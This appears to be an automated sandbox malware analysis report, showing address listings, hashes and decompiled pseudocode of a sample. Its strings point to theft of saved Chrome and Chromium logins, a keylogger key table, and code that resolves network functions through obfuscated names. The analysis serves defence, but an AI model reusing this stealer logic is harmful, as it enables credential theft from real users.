                                                          0x00405b4c
                                                          0x00405b4c
                                                          0x00405b51
                                                          0x00405b55
                                                          0x00405b59
                                                          0x00405b59
                                                          0x00405b60
                                                          0x00000000
                                                          0x00000000
                                                          0x00405b66
                                                          0x00405b6a
                                                          0x00405b70
                                                          0x00405b73
                                                          0x00405b77
                                                          0x00405b7e
                                                          0x00405beb
                                                          0x00405bf6
                                                          0x00000000
                                                          0x00405bf6
                                                          0x00405b80
                                                          0x00405b88
                                                          0x00405b90
                                                          0x00405b97
                                                          0x00405b9f
                                                          0x00405ba7
                                                          0x00405bab
                                                          0x00405bae
                                                          0x00405bb2
                                                          0x00405bb7
                                                          0x00405bbc
                                                          0x00405bcd
                                                          0x00405bd1
                                                          0x00405bd5
                                                          0x00405bdd
                                                          0x00405be7
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405be9
                                                          0x00405bbe
                                                          0x00405bbe
                                                          0x00405bc1
                                                          0x00000000
                                                          0x00405bc1
                                                          0x00000000
                                                          0x00405b59
                                                          0x004059ff
                                                          0x00405a06
                                                          0x00405a06
                                                          0x00405a0b
                                                          0x00405a0f
                                                          0x00405a13
                                                          0x00405a13
                                                          0x00405a1a
                                                          0x00000000
                                                          0x00000000
                                                          0x00405a20
                                                          0x00405a24
                                                          0x00405a2a
                                                          0x00405a2d
                                                          0x00405a31
                                                          0x00405a38
                                                          0x00405b1b
                                                          0x00405b26
                                                          0x00000000
                                                          0x00405b26
                                                          0x00405a3e
                                                          0x00405a46
                                                          0x00405a4e
                                                          0x00405a55
                                                          0x00405a5d
                                                          0x00405a65
                                                          0x00405a69
                                                          0x00405a6c
                                                          0x00405a70
                                                          0x00405a75
                                                          0x00405a7a
                                                          0x00405b13
                                                          0x00405b13
                                                          0x00405b16
                                                          0x00000000
                                                          0x00405b16
                                                          0x00405a80
                                                          0x00405a86
                                                          0x00405a8c
                                                          0x00405a92
                                                          0x00405a96
                                                          0x00405a9e
                                                          0x00405aa2
                                                          0x00405aac
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405aae
                                                          0x00405aae
                                                          0x00405ab9
                                                          0x00405abe
                                                          0x00405ac6
                                                          0x00000000
                                                          0x00000000
                                                          0x00405acc
                                                          0x00405ad2
                                                          0x00405ad8
                                                          0x00405b09
                                                          0x00405b0d
                                                          0x00405ada
                                                          0x00405ae0
                                                          0x00405ae4
                                                          0x00405ae4
                                                          0x00405ae8
                                                          0x00405aec
                                                          0x00405af6
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405af6
                                                          0x00000000
                                                          0x00405aae
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 257ab1642c2ba7176df9333284737b40def127f22e375dc60ae8d0ec264ec92a
                                                          • Instruction ID: dc7f80c90ba20af356347f24dd4de35e54817c060e921352895bdcebc13e1e4f
                                                          • Opcode Fuzzy Hash: 257ab1642c2ba7176df9333284737b40def127f22e375dc60ae8d0ec264ec92a
                                                          • Instruction Fuzzy Hash: 7D71B7B0508B059FD710EF29D58465BBBE0FF84354F54893EE88897392D778A4468F4A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004106BD, Relevance: .1, Instructions: 85COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 98%
                                                          			E004106BD(void* __eax, char _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v24;
				char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v56;
				char _v60;
				intOrPtr _v64;
				signed int _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v80;
				intOrPtr _v84;
				signed int _v88;
				intOrPtr _v92;
				char _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				intOrPtr _v112;
				intOrPtr _v120;
				intOrPtr _v124;
				char* _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				signed int _t44;
				signed int _t45;
				signed int _t49;
				char _t51;
				intOrPtr _t53;
				char _t54;
				signed int _t55;
				signed int _t56;
				intOrPtr _t57;
				char* _t58;
				void* _t59;
				void* _t61;
				signed int* _t62;

				_t54 = _a4;
				_t57 = _a8;
				_t56 =  &_v40;
				_v64 = 0x201;
				_v68 = 0;
				_v60 = _t56;
				_t53 = _a12;
				_v72 = _t57;
				_v76 = _t54; // executed
				L0041F42C(); // executed
				_t61 = _t59 - 0x28;
				if(__eax != 0) {
					_v96 = _t54;
					_v80 = _t56;
					_t55 = 0;
					_v84 = 0x101;
					_v88 = 0;
					_v92 = _t57;
					L0041F42C(); // executed
					_t62 = _t61 - 0x14;
					if(__eax == 0) {
						_t44 = _v80;
						_t58 =  &_v76;
						_v100 = 0;
						_v104 = 0;
						_v108 = 0;
						_v96 = _t58;
						_v112 = _t53;
						 *_t62 = _t44;
						L0041F424();
						_t62 = _t62 - 0x18;
						if(_t44 == 0 && _v100 < _v44) {
							goto L7;
						}
						goto L8;
					}
				} else {
					_t51 = _v60;
					_t58 =  &_v56;
					_v80 = 0;
					_v84 = 0;
					_v88 = 0;
					_t55 = 0;
					_v76 = _t58;
					_v92 = _t53;
					_v96 = _t51;
					L0041F424();
					_t62 = _t61 - 0x18;
					if(_t51 == 0 && _v24 > _v80) {
						L7:
						_v120 = _t58;
						_v132 = 0;
						_v136 = _t53;
						_v124 = _v48;
						_v128 =  &_v96;
						_t49 = _v104;
						 *_t62 = _t49;
						L0041F424();
						_t62 = _t62 - 0x18;
						_t55 = _t49 & 0xffffff00 | _t49 == 0x00000000;
					}
					L8:
					_t45 = _v104;
					 *_t62 = _t45;
					L0041F45C();
					_push(_t45);
				}
				return _t55;
			}








































                                                          0x004106c4
                                                          0x004106c8
                                                          0x004106cc
                                                          0x004106d0
                                                          0x004106d8
                                                          0x004106e0
                                                          0x004106e4
                                                          0x004106e8
                                                          0x004106ec
                                                          0x004106ef
                                                          0x004106f4
                                                          0x004106f9
                                                          0x00410748
                                                          0x0041074b
                                                          0x0041074f
                                                          0x00410751
                                                          0x00410759
                                                          0x00410761
                                                          0x00410765
                                                          0x0041076a
                                                          0x0041076f
                                                          0x00410775
                                                          0x00410779
                                                          0x0041077d
                                                          0x00410785
                                                          0x0041078d
                                                          0x00410795
                                                          0x00410799
                                                          0x0041079d
                                                          0x004107a0
                                                          0x004107a5
                                                          0x004107aa
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004107aa
                                                          0x004106fb
                                                          0x004106fb
                                                          0x004106ff
                                                          0x00410703
                                                          0x0041070b
                                                          0x00410713
                                                          0x0041071b
                                                          0x0041071d
                                                          0x00410721
                                                          0x00410725
                                                          0x00410728
                                                          0x0041072d
                                                          0x00410732
                                                          0x004107b6
                                                          0x004107ba
                                                          0x004107be
                                                          0x004107c6
                                                          0x004107ca
                                                          0x004107d2
                                                          0x004107d6
                                                          0x004107da
                                                          0x004107dd
                                                          0x004107e2
                                                          0x004107ea
                                                          0x004107ea
                                                          0x004107ec
                                                          0x004107ec
                                                          0x004107f0
                                                          0x004107f3
                                                          0x004107f8
                                                          0x004107f8
                                                          0x00410802

                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e61b238f31f9a1af3280de932191ddadf40332958d4424c58cf9f30b9089abbc
                                                          • Instruction ID: b9298c354bfd1ad9ab6003ea3d07812b51851590691558723ca7996c5ddaa5d6
                                                          • Opcode Fuzzy Hash: e61b238f31f9a1af3280de932191ddadf40332958d4424c58cf9f30b9089abbc
                                                          • Instruction Fuzzy Hash: 8331C3B55083059BD300AF6AC54435BFBE4BB84758F40892EF89897351D7B8EA898F86
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405214, Relevance: .1, Instructions: 59COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d49987523794ce8ed4bb060c03339be3ab30899d0a78e50f53fa3c85019847e2
                                                          • Instruction ID: 20f5eab9ee5944eb72183824eaa05ad15d37d7ba85e5585d89411a70b12a9a58
                                                          • Opcode Fuzzy Hash: d49987523794ce8ed4bb060c03339be3ab30899d0a78e50f53fa3c85019847e2
                                                          • Instruction Fuzzy Hash: 0221A7B1409741AED340EF59D18835BFFE0AF84748F80992EF89457251D3B999888F87
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405EE7, Relevance: .1, Instructions: 56COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2cc43028804df6e7031d7bdb477b00ee3d25e214831442e515feb843a0defbf8
                                                          • Instruction ID: 3284ca1fbe294b016ba812f83614f168e55cc85ae0225a429d2d4095fe025a78
                                                          • Opcode Fuzzy Hash: 2cc43028804df6e7031d7bdb477b00ee3d25e214831442e515feb843a0defbf8
                                                          • Instruction Fuzzy Hash: 4B111CB05187419EE710AF25C54479BBBE8FF88308F00892EE89897281D77C85458F56
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405CC4, Relevance: .1, Instructions: 52COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a1cf67d523e38ab282052ba767e4d7ed1a34ce180a81d7b67339777580b685cf
                                                          • Instruction ID: e4f2ceb084e057a26f4344f627522697bcbae48ed975df61c26fef9454d4b794
                                                          • Opcode Fuzzy Hash: a1cf67d523e38ab282052ba767e4d7ed1a34ce180a81d7b67339777580b685cf
                                                          • Instruction Fuzzy Hash: 26114CB05087059FE310AF26C54876BFBE8EFC4758F00892FE89897281D379D5498F96
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0041317C, Relevance: .0, Instructions: 39COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 66d348306cd4d6e08c150d2591b3561f405742941a1a59f410c48e2ec4514cc5
                                                          • Instruction ID: 2103f98854d31d6ee21eef8c691fbd4061408f6fabc572c20ce2be922a60f6fa
                                                          • Opcode Fuzzy Hash: 66d348306cd4d6e08c150d2591b3561f405742941a1a59f410c48e2ec4514cc5
                                                          • Instruction Fuzzy Hash: F00140B04083019AD310FF26D54535BFFE4AFC4758F008A1EE49887255D3788689CB87
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004051B5, Relevance: .0, Instructions: 31COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2e7b8c339338589e02d34dbb988770e9779c51bc79032b7918c0481683a5381f
                                                          • Instruction ID: c7c63fa6584d291762938b61b036814656b365f8fb5761cd288c2352f27d1738
                                                          • Opcode Fuzzy Hash: 2e7b8c339338589e02d34dbb988770e9779c51bc79032b7918c0481683a5381f
                                                          • Instruction Fuzzy Hash: 6AF01DB45157109FC710EF29C48165BBBE0FF48314F06895DE8C89B316E238D880CB56
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405959, Relevance: .0, Instructions: 16COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 586562ab7f660d792621f7f3ff03a76942849b748750d6b5247e0080a37609ce
                                                          • Instruction ID: 24ad92727fe000e7c60640d94de1f7f21ee868b5df478abe0a14dc0806b9406b
                                                          • Opcode Fuzzy Hash: 586562ab7f660d792621f7f3ff03a76942849b748750d6b5247e0080a37609ce
                                                          • Instruction Fuzzy Hash: A4D012F0504301AEE710BF51D4057BA7AE8AB41310F41483EA8D086242D77D448D4AA7
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00408AB3, Relevance: .0, Instructions: 16COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c3194e90da334e6e38a89a9e3cd57681737c8a67fcd2182493c3a531e1f22581
                                                          • Instruction ID: ad06f29d9f34d8de5c37fb948c6dfac14eb5c16bc83129ba4182c5028b8a9bce
                                                          • Opcode Fuzzy Hash: c3194e90da334e6e38a89a9e3cd57681737c8a67fcd2182493c3a531e1f22581
                                                          • Instruction Fuzzy Hash: FED05EB4504701AAD714FF2982453993EE05B40308F84843EDC88C3796E3BD81DD8B1B
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00407EF4, Relevance: .0, Instructions: 7COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e3c58914c79796914ae3652b9338830a73e9f14980a586d20e581d2826090cc4
                                                          • Instruction ID: d679871287b4664fab267dfb904784a560a8627629bc176350aa90e446a3ed10
                                                          • Opcode Fuzzy Hash: e3c58914c79796914ae3652b9338830a73e9f14980a586d20e581d2826090cc4
                                                          • Instruction Fuzzy Hash: D1B01274904B4047C700BF6C854245B7AE87A44304FC409ACF8C4D3303E13C82998A6B
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Function 00420420, Relevance: 5.2, Strings: 4, Instructions: 217COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ../nettle-3.5.1/memxor.c$n & 1$n == 1$o
                                                          • API String ID: 0-561580802
                                                          • Opcode ID: c778598c57938beeda3a03c633ed9cdd53ae4a03349816565a6a334ef414175d
                                                          • Instruction ID: 3ee2903d3d2c0e63440c59b9d95d43c21fe2c472ea4d5dc2fd0c85ac53de4ac0
                                                          • Opcode Fuzzy Hash: c778598c57938beeda3a03c633ed9cdd53ae4a03349816565a6a334ef414175d
                                                          • Instruction Fuzzy Hash: BB919E72A083628FC714CF29D48051AFBE2BFD8314F498A2EE8D59B355D735E945CB82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040F281, Relevance: 3.8, Strings: 3, Instructions: 37COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %s\Google\Chrome\User Data\Default\Login Data$%s\Google\Chrome\User Data\Local State$LOCALAPPDATA
                                                          • API String ID: 0-1755387443
                                                          • Opcode ID: 25c53191b8215658669394e1d36e76e7889413c500fa165d3e3269e3eeecf20e
                                                          • Instruction ID: 71a4254163051be47397212b88bd25a6cdd91ad02d264920333697808a15e276
                                                          • Opcode Fuzzy Hash: 25c53191b8215658669394e1d36e76e7889413c500fa165d3e3269e3eeecf20e
                                                          • Instruction Fuzzy Hash: 8E0108F4408311AAC710BF62E44515EBBE0AF80398F51C83EE4D86B282C37C8599CB5A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040F382, Relevance: 3.8, Strings: 3, Instructions: 37COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %s\Chromium\User Data\Default\Login Data$%s\Chromium\User Data\Local State$LOCALAPPDATA
                                                          • API String ID: 0-2609310803
                                                          • Opcode ID: 21c6e6d024086da1ece91e8104a1bc99ea1c428e8fdbf93201ad434112c70fdf
                                                          • Instruction ID: 1af54e81e90a1b2e64d1cb376851d72e513c3029c4754ec5bb28f3db25ee8883
                                                          • Opcode Fuzzy Hash: 21c6e6d024086da1ece91e8104a1bc99ea1c428e8fdbf93201ad434112c70fdf
                                                          • Instruction Fuzzy Hash: 8A011AB0408311AAC710BF22E44515EBFE0EF80358F51C83EE4D857282C77C8599CB4B
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00409953, Relevance: 30.2, Strings: 24, Instructions: 210COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$@$@$[%s]$[-Wld]$[904R5 MY0ddR]$[9Cnd aWgR]$[9Cnd us]$[Ctrl+%s]$[D00Wg aWgR]$[D00Wg md85]$[D00Wg r4nI5]$[D00Wg us]$[MY0Wii mWYw]$[P50i+%Y]$[PCs6 mWYw]$[XR6d05]$[adid5d]$[c0dCw]$[cCYw6sCYd]$[j6Y]$[jR5d0]$[jRS]$[qCV]
                                                          • API String ID: 0-287945508
                                                          • Opcode ID: a7201299a71ac298b4eb1a048ca88babafc008e2bbcecdb455fdf88870e38ce2
                                                          • Instruction ID: 165817b8f912d8248abf4659c11c564849502453b133aa370f8f06421a69fc02
                                                          • Opcode Fuzzy Hash: a7201299a71ac298b4eb1a048ca88babafc008e2bbcecdb455fdf88870e38ce2
                                                          • Instruction Fuzzy Hash: 5D815AB0608351DAD720AF59D4C436FBAF4FB81304F51892FE4D566282C3BD49859F6B
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00408417, Relevance: 24.0, Strings: 19, Instructions: 294COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 50%
                                                          			E00408417(void* __edx, void* __eflags, char _a4, void* _a12, char _a20, char _a24, void _a36, intOrPtr _a40, intOrPtr _a56, char _a64, char _a65, char _a66, char _a67, char _a68, char _a69, void _a80, void _a88, void _a92, void* _a116, char _a136, char _a180, char _a200) {
				char _v0;
				void _v7;
				void* _v8;
				void* _v9;
				void* _v10;
				void* _v11;
				void* _v12;
				void* _v13;
				void* _v16;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				char _v40;
				char _v44;
				void* _v48;
				void* _v52;
				char _v56;
				intOrPtr _v64;
				intOrPtr _v68;
				void* _v72;
				intOrPtr* _t121;
				char _t122;
				intOrPtr* _t123;
				intOrPtr* _t131;
				intOrPtr* _t138;
				intOrPtr _t150;
				int _t152;
				void* _t155;
				void* _t157;
				intOrPtr* _t169;
				intOrPtr* _t173;
				intOrPtr* _t185;
				intOrPtr* _t186;
				intOrPtr* _t187;
				char _t188;
				intOrPtr _t189;
				intOrPtr _t190;
				void* _t201;
				void* _t202;
				intOrPtr* _t221;
				intOrPtr* _t223;
				intOrPtr* _t224;
				intOrPtr* _t225;
				intOrPtr* _t229;
				intOrPtr* _t230;
				intOrPtr _t235;
				void* _t236;
				intOrPtr* _t237;
				intOrPtr* _t242;

				_t201 = __edx;
				_t237 = _t236 - E0041F3F0(0x110c);
				_t121 = E004081AA("U4R-55sTsdR");
				_v16 = "winhttp.dll";
				L0041F55C();
				_v16 = _t121;
				 *_t237 = _t121;
				L0041F5AC();
				_push(_t202);
				_t185 = _t121;
				_v28 = "U4R-55sEd590WfZ_W0u0i";
				_t122 = E004081AA(_t202);
				_v28 = "winhttp.dll";
				L0041F55C();
				_v28 = _t122;
				_v32 = _t122;
				L0041F5AC();
				_push(_t201);
				_push(_t201);
				if(_t185 != 0 && _t122 != 0) {
					memcpy( &_a80, L"InternetProxy", 7 << 2);
					_t191 = 0;
					_v24 = 0;
					_v28 = 0;
					_v32 = 0;
					_v36 = 1;
					_v40 =  &_a80;
					_a4 = 0;
					_t150 =  *_t185();
					_t237 = _t237 + 0xc - 0x14;
					_t189 = _t150;
					if(_t150 != 0) {
						_t201 =  &_a24;
						_t152 = memset( &_a36, _v16, 6 << 2);
						_a36 = 1;
						_a40 = 3;
						_a56 = 1;
						memset(_t201, _t152, 3 << 2);
						_t155 = memcpy( &_a88, L"http://www.yandex.com", 0xb << 2);
						_t242 = _t237 + 0x24;
						_t191 = 0;
						_v52 = _t155;
						_v48 = _t201;
						 *_t242 = _t189;
						_v56 =  &_a88;
						_t157 = _v0();
						_t237 = _t242 - 0x10;
						if(_t157 != 0) {
							memcpy( &_v7, "socks=", 7);
							_t237 = _t237 + 0xc;
							_t191 = 0;
							_v64 = _t190;
							_v68 = _t235;
							_v72 =  &_v7;
							 *_t237 =  &_a180;
							_t169 = E00408306(0, _t248);
							if(_t169 != 0) {
								 *_t237 = 0x8c;
								L0041F714();
								_t229 = _t169;
								_v68 = 0x40;
								_v72 = _t235;
								 *_t237 = _t169 + 4;
								E00412548();
								 *_t229 = 0;
								 *_t237 = _t190;
								 *((intOrPtr*)(_t229 + 0x44)) = E00412666(0);
								_t173 =  *0x42b304;
								 *0x42b304 = _t229;
								 *((intOrPtr*)(_t229 + 0x88)) = _t173;
								 *_t237 = 0x8c;
								L0041F714();
								_t230 = _t173;
								_v68 = 0x40;
								_v72 = _t235;
								 *_t237 = _t173 + 4;
								E00412548();
								 *_t230 = 2;
								 *_t237 = _t190;
								 *((intOrPtr*)(_t230 + 0x44)) = E00412666(0);
								 *0x42b304 = _t230;
								 *((intOrPtr*)(_t230 + 0x88)) =  *0x42b304;
								_v68 = 4;
								_v72 = 0x422fa5;
								 *_t237 = 0x4223dc;
								E00412548();
							}
						}
					}
				}
				_t123 = E004081AA("U4R-55sEd5Xj90WfZPWR84n_W0PQ00dR5u6d0");
				_v40 = "winhttp.dll";
				_t186 = _t123;
				L0041F55C();
				_push(_t191);
				_v40 = _t186;
				_v44 = _t123;
				L0041F5AC();
				_push(_t186);
				_t221 = _t123;
				_push(_t186);
				if(_t123 != 0) {
					_v52 = 0x10;
					L0041F714();
					_t187 = _t123;
					_v52 = _t123;
					_t123 =  *_t221();
					_t251 = _t123;
					_push(_t201);
					if(_t123 != 0) {
						_v48 = "%S";
						_t188 =  &_a20;
						_v52 = 0x1000;
						_t233 =  &_a136;
						_v44 =  *((intOrPtr*)(_t187 + 8));
						_v56 =  &_a200;
						E004127A8();
						E00412588( &_a200, 0x422f70, 0x1000);
						_v44 = _t188;
						_v48 =  &_a136;
						_a64 = 0x68;
						_a65 = 0x74;
						_v52 =  &_a64;
						_a66 = 0x74;
						_a67 = 0x70;
						_a68 = 0x3d;
						_v56 =  &_a200;
						_a69 = 0;
						_t131 = E00408306(_t191, _t251);
						_t252 = _t131;
						if(_t131 != 0) {
							_v56 = 0x8c;
							L0041F714();
							_t225 = _t131;
							E00412548(_t131 + 4, _t233, 0x40);
							 *_t225 = 3;
							_v56 = _t188;
							 *((intOrPtr*)(_t225 + 0x44)) = E00412666(_t191);
							 *0x42b304 = _t225;
							 *((intOrPtr*)(_t225 + 0x88)) =  *0x42b304;
							E00412548(0x4223dc, 0x422fa5, 4);
						}
						memcpy( &_a92, "socks=", 7);
						_t237 = _t237 + 0xc;
						_t123 = E00408306(0, _t252,  &_a200,  &_a92, _t233, _t188);
						if(_t123 != 0) {
							_v56 = 0x8c;
							L0041F714();
							_t223 = _t123;
							E00412548(_t123 + 4, _t233, 0x40);
							 *_t223 = 2;
							_v56 = _t188;
							 *((intOrPtr*)(_t223 + 0x44)) = E00412666(0);
							_t138 =  *0x42b304;
							 *0x42b304 = _t223;
							 *((intOrPtr*)(_t223 + 0x88)) = _t138;
							_v56 = 0x8c;
							L0041F714();
							_t224 = _t138;
							E00412548(_t138 + 4, _t233, 0x40);
							 *_t224 = 0;
							_v56 = _t188;
							 *((intOrPtr*)(_t224 + 0x44)) = E00412666(0);
							 *0x42b304 = _t224;
							 *((intOrPtr*)(_t224 + 0x88)) =  *0x42b304;
							_t123 = E00412548(0x4223dc, 0x422fa5, 4);
						}
					}
				}
				return _t123;
			}





















































                                                          0x00408417
                                                          0x00408425
                                                          0x0040842e
                                                          0x00408433
                                                          0x0040843c
                                                          0x00408442
                                                          0x00408446
                                                          0x00408449
                                                          0x0040844e
                                                          0x00408450
                                                          0x00408452
                                                          0x00408459
                                                          0x0040845e
                                                          0x00408467
                                                          0x0040846d
                                                          0x00408471
                                                          0x00408474
                                                          0x0040847b
                                                          0x0040847c
                                                          0x0040847d
                                                          0x0040849b
                                                          0x0040849b
                                                          0x004084a1
                                                          0x004084a9
                                                          0x004084b1
                                                          0x004084b9
                                                          0x004084c1
                                                          0x004084c4
                                                          0x004084c8
                                                          0x004084ca
                                                          0x004084cf
                                                          0x004084d1
                                                          0x004084db
                                                          0x004084ed
                                                          0x004084f6
                                                          0x004084fe
                                                          0x00408506
                                                          0x0040850e
                                                          0x00408520
                                                          0x00408520
                                                          0x00408520
                                                          0x00408522
                                                          0x0040852d
                                                          0x00408531
                                                          0x00408534
                                                          0x00408538
                                                          0x0040853a
                                                          0x0040853f
                                                          0x00408648
                                                          0x00408648
                                                          0x00408648
                                                          0x0040864e
                                                          0x00408652
                                                          0x00408656
                                                          0x00408661
                                                          0x00408664
                                                          0x0040866b
                                                          0x00408671
                                                          0x00408678
                                                          0x0040867d
                                                          0x00408682
                                                          0x0040868a
                                                          0x0040868e
                                                          0x00408691
                                                          0x00408696
                                                          0x0040869c
                                                          0x004086a4
                                                          0x004086a7
                                                          0x004086ac
                                                          0x004086b2
                                                          0x004086b8
                                                          0x004086bf
                                                          0x004086c4
                                                          0x004086c9
                                                          0x004086d1
                                                          0x004086d5
                                                          0x004086d8
                                                          0x004086dd
                                                          0x004086e3
                                                          0x004086eb
                                                          0x004086f3
                                                          0x004086f9
                                                          0x004086ff
                                                          0x00408707
                                                          0x0040870f
                                                          0x00408716
                                                          0x00408716
                                                          0x0040866b
                                                          0x0040853f
                                                          0x004084d1
                                                          0x00408722
                                                          0x00408727
                                                          0x0040872e
                                                          0x00408730
                                                          0x00408735
                                                          0x00408736
                                                          0x0040873a
                                                          0x0040873d
                                                          0x00408744
                                                          0x00408745
                                                          0x00408747
                                                          0x00408748
                                                          0x0040874e
                                                          0x00408755
                                                          0x0040875a
                                                          0x0040875c
                                                          0x0040875f
                                                          0x00408761
                                                          0x00408763
                                                          0x00408764
                                                          0x0040876d
                                                          0x00408775
                                                          0x00408779
                                                          0x00408781
                                                          0x00408788
                                                          0x00408793
                                                          0x00408796
                                                          0x004087b5
                                                          0x004087be
                                                          0x004087c2
                                                          0x004087c6
                                                          0x004087cb
                                                          0x004087d0
                                                          0x004087db
                                                          0x004087e0
                                                          0x004087e5
                                                          0x004087ea
